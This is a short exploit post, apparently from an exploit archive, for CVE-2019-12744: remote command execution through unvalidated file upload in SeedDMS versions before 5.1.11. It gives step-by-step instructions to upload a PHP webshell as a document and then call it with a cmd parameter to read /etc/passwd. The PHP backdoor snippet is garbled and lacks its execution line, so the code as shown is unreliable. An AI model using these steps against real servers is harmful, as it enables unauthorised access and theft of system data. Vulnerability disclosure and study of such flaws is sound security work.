SeedDMS Remote Command Execution

SeedDMS versions prior to 5.1.11 suffers from a remote shell upload vulnerability.

MD5 | c2c699fa93396fba26fcb5608d8cb867

# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](
# Vendor Homepage: []
# Software Link: []
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code:

echo "<pre>";
$cmd = ($_REQUEST['cmd']);
echo "</pre>";


Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

Related Posts